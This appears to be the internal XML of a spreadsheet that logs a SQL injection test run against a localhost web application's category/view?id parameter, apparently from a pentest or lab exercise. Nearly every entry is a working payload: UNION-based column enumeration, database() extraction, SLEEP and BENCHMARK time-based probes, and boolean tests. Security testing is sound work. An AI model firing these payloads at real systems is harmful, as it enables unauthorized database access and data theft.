    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:19 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:20 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX'#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:21 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:22 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id='%20UNION%20ALL%20SELECT%2067,CONCAT(0x7162716b71,0x706a6e686868707941774a4f467a6f794e4d6773597173727a75566868625a6d43754f4772684552,0x716b717a71),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-</t>
  </si>
  <si>
    <t>[' UNION ALL SELECT 67,CONCAT(0x7162716b71,0x706a6e686868707941774a4f467a6f794e4d6773597173727a75566868625a6d43754f4772684552,0x716b717a71),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=-5703'%20UNION%20ALL%20SELECT%2067,CONCAT(0x7162716b71,0x706a6e686868707941774a4f467a6f794e4d6773597173727a75566868625a6d43754f4772684552,0x716b717a71),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-</t>
  </si>
  <si>
    <t>[-5703' UNION ALL SELECT 67,CONCAT(0x7162716b71,0x706a6e686868707941774a4f467a6f794e4d6773597173727a75566868625a6d43754f4772684552,0x716b717a71),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:23 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id='%20AND%20(SELECT%209105%20FROM%20(SELECT(SLEEP(5)))WTmQ)%20AND%20'Seyf'='Seyf</t>
  </si>
  <si>
    <t>[' AND (SELECT 9105 FROM (SELECT(SLEEP(5)))WTmQ) AND 'Seyf'='Seyf]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3'%20AND%20(SELECT%209105%20FROM%20(SELECT(SLEEP(5)))WTmQ)%20AND%20'Seyf'='Seyf</t>
  </si>
  <si>
    <t>[3' AND (SELECT 9105 FROM (SELECT(SLEEP(5)))WTmQ) AND 'Seyf'='Seyf]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=';SELECT%20SLEEP(5)%23</t>
  </si>
  <si>
    <t>[';SELECT SLEEP(5)#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:28 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3'%20AND%205584=5584%20AND%20'fkel'='fkel</t>
  </si>
  <si>
    <t>[3' AND 5584=5584 AND 'fkel'='fkel]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:43 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=3';SELECT%20SLEEP(5)%23</t>
  </si>
  <si>
    <t>[3';SELECT SLEEP(5)#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id='%20AND%205584=5584%20AND%20'fkel'='fkel</t>
  </si>
  <si>
    <t>[' AND 5584=5584 AND 'fkel'='fkel]</t>
  </si>
  <si>
    <t>Tue Dec 08 21:58:11 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id='%20UNION%20ALL%20SELECT%2067,CONCAT(0x0a,database(),0x0a),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-</t>
  </si>
  <si>
    <t>[' UNION ALL SELECT 67,CONCAT(0x0a,database(),0x0a),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -]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</si>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</sst>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Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color rgb="FF0563C1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color theme="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color rgb="FF0562C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7" fillId="0" borderId="0" xfId="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1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56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9999/category/view?id=3%20ORDER%20BY%2016%20" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30" TargetMode="External"/><Relationship Id="rId47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" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=1--" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2027%20" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3%23" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5%23" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%204--%20" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3or%20pg_SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId413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--%20" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),%22'3" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2015--%20" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--%20" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId424" 